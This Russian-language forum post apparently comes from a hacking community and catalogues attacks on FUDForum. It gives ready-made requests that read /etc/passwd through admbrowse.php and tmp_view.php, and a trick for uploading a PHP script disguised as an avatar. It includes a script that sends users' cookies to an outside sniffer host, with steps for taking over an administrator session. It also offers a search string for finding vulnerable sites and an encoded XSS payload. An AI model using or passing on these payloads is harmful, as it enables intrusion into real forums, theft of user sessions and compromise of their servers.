Показать сообщение отдельно

[Обзор Уязвимости FUDForum]
  #1  
Старый 12.01.2008, 23:25
Solide Snake
Постоянный
Регистрация: 28.04.2007
Сообщений: 547
С нами: 10019906

Репутация: 3702


Post [Обзор Уязвимости FUDForum]

[Обзор] Уязвимости FUDForum


Офф. Сайт www.fudforum.org
Актуальная версия 2.7.7
Исходники Скачать

Уязвимость в admbrowse.php


Уязвимость в admbrowse.php позволяет просматривать произвольные файлы

Код:
admbrowse.phpdown=1&cur=%2Fetc%2F&dest=passwd&rid=1&S=[someid]

FUD Forum 2.7.1 PHP code injection vurnelability


Возможность залить вместо аватара PHP скрипт, для этого соедините аватар с PHP файлом.

Под linux/unix

Код:
cat foo.png foo.php > upload_me.php
В win в простом Notepad.


Уязвимость в tmp_view.php


Уязвимость позволяет просматривать произвольные файлы.

Код:
/tmp_view.php?file=/etc/passwd

Кража cookie


Берём картинку, с названием 1.jpg
Открываем блокнотом. И вставляем в картинку допустим:

Код:
<html> 
<head> 
<script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> 
</head> 
</html>

После вставки в сообщение будет ссылка наподобии этой:

Код:
http://forum.site.ru/index.php?t=getfile&id=2723&private=0
или так нагляднее:

Код:
http://forum.site.ru/index.php?t=getfile&id=2723
После открытия этой ссылки произойдёт кража куков пользователей.

******
Далее идем сюда:

Код:
http://old.antichat.ru/sniff/log.php
И вставляем куки себе. И получаем права аминистратора.

Для поиска:

Код:
Powered by: FUDforum 2.7.4

XSS


На некоторых версиях при отключённых картинках, подписях и т.д. есть возможность провести XSS в отправке сообщения:

Код:
[img=javascript:alert('bugs!');]Бага[/img]
В слове javascript букву t нужно заменить на код & # 116 ; без пробелов.

(c)

Последний раз редактировалось Solide Snake; 01.03.2008 в 21:18..
 
Ответить с цитированием